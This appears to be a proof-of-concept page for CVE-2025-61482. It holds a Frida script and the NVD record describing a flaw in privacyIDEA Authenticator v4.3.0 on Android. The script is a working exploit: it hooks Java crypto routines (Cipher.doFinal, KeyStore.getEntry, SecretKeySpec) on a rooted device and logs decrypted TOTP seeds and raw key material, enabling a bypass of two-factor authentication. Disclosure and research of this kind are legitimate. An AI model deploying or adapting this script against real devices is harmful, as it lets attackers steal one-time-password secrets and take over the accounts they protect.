CVE-2025-61482

// CVE-2025-61482 PoC - Frida script to extract TOTP secrets from privacyIDEA Authenticator // Requirements: rooted Android device, frida-server running, privacyIDEA Authenticator v4.3.0 installed Java.perform(function() { // Hook Cipher.doFinal to capture decrypted TOTP seeds var Cipher = Java.use('javax.crypto.Cipher'); Cipher.doFinal.overload('[B').implementation = function(encryptedData) { var result = this.doFinal(encryptedData); console.log('[+] Captured decrypted data: ' + bytesToHex(result)); // Log potential TOTP seed (32 bytes for standard TOTP) if (result.length >= 20) { console.log('[!] Possible TOTP seed extracted'); } return result; }; // Hook KeyStore getEntry to capture secret keys var KeyStore = Java.use('java.security.KeyStore'); KeyStore.getEntry.implementation = function(alias, param) { var entry = this.getEntry(alias, param); console.log('[+] KeyStore entry accessed for alias: ' + alias); return entry; }; // Hook SecretKeySpec initialization to capture raw keys var SecretKeySpec = Java.use('javax.crypto.spec.SecretKeySpec'); SecretKeySpec.$init.overload('[B', 'java.lang.String').implementation = function(key, algorithm) { console.log('[+] SecretKeySpec created with algorithm: ' + algorithm); if (algorithm.indexOf('AES') !== -1 || algorithm.indexOf('Hmac') !== -1) { console.log('[!] Potential OTP key material: ' + bytesToHex(key)); } return this.$init(key, algorithm); }; }); function bytesToHex(bytes) { return Array.from(bytes).map(b => ('00' + (b & 0xFF).toString(16)).slice(-2)).join(''); }

{"cve": {"id": "CVE-2025-61482", "sourceIdentifier": "[email protected]", "published": "2025-10-27T15:15:38.917", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper handling of OTP/TOTP/HOTP values in NetKnights GmbH privacyIDEA Authenticator v.4.3.0 on Android allows local attackers with root access to bypass two factor authentication. By hooking into app crypto routines and intercepting decryption paths, attacker can recover plaintext secrets, enabling generation of valid one-time passwords, and bypassing authentication for enrolled accounts."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:N", "baseScore": 7.2, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "HIGH", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 0.8, "impactScore": 5.8}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-200"}, {"lang": "en", "value": "CWE-522"}, {"lang": "en", "value": "CWE-922"}]}], "references": [{"url": "https://github.com/ReversecLabs/android-keystore-audit/blob/master/frida-scripts/tracer-cipher.js", "source": "[email protected]"}, {"url": "https://svarthatt.se/cve/cve-2025-61482-pulling-otp-secrets-from-privacyidea-authenticator/", "source": "[email protected]"}]}}